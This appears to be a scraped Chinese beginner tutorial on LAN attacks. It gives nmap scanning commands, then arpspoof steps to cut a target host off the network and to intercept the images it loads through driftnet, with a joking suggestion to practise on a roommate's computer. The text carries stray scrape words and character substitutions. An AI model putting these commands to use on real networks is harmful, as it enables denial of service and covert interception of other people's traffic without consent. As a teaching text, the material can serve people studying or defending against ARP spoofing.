【无线安全实践入门】网络扫描和ARP欺骗

文中可能存在错误操做或错误理解,望你们不吝指正.
同时也但愿能够帮助到想要学习接触此方面、或兴趣使然的你,让你有个大概的印象.

!阅前须知!
本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的部分笔记.
本文中的工具可能已通过时,或使用方法已经改变了,感兴趣能够深刻查阅资料
(可是我仍是列出之前的使用方法供你们借鉴).html

ps.若对无线攻击手段WiFi破解感兴趣能够参考如下两篇文章
【无线安全实践入门】基础攻击手段与经常使用工具简介
【无线安全实践入门】破解WiFi密码的多个方法linux

ps.本文环境在Kali下,学习最好具有一点linux基础知识.

安全

1.网络扫描和嗅探

NMap(Network Mapper),一个很不错的网络扫描和嗅探工具包网络

--NMap真的很经常使用,简直神器
--列出几种简单的使用方法:

--ping扫描,快速,不过回显的内容有限
> nmap -sP (网关IP)/(子网掩码)

--SYN/半开放扫描,加上-A回显详细信息
> nmap -sS [-A] (网关IP)/(子网掩码)

--单个扫描,显示详细内容
> nmap -A (目标IP)

--示例
> nmap -sP 192.168.1.1/24


2.ARP欺骗

局域网中的ARP欺骗仍是比较有意思的.像arpspoofEttercap等工具都很不错.
arp欺骗以后其实能够不少动做的...
这里就介绍老掉牙的arpspoof的断网攻击和图片捕获.app

ps.有条件的话,能够拿手机或者室友电脑练手(doge脸).工具

--首先,在局域网环境中配合NMap工具使用,取得目标IP
> nmap -sP (网关IP)/(子网掩码)

2.1.断网攻击学习

ps.修改ip_forward的值,是为了开启IP转发,其值为'0'时候则禁止转发,目标主机断网.测试

--修改ip_forward(默认为'0')
--能够提早cat查看一下,如果回显'0',则能够跳过本步
> echo 0 > /proc/sys/net/ipv4/ip_forward 

--开始arp欺骗
> arpspoof -i (你的网卡名称) -t (目标IP) (网关IP)

--使用目标主机上网测试,观察命令行回显.

2.2.图片捕获命令行

--修改ip_forward(默认为'0')
--能够提早cat查看一下,如果回显'1',则能够跳过本步
> echo 1 > /proc/sys/net/ipv4/ip_forward 

--开始arp欺骗(本机网卡名,能够用ifconfig来查看)
> arpspoof -i (本机网卡名) -t (目标IP) (网关IP)

--另外再开一终端,开始抓取图片
> drifnet -i (本机网卡名)

--使用目标主机上网看图片,观察弹出的窗口回显图片,观察命令行回显.

常见的网络协议是网络安全中的基础,能让你可以更快吸取了解技术细节.code

加油,共勉

相关文章
相关标签/搜索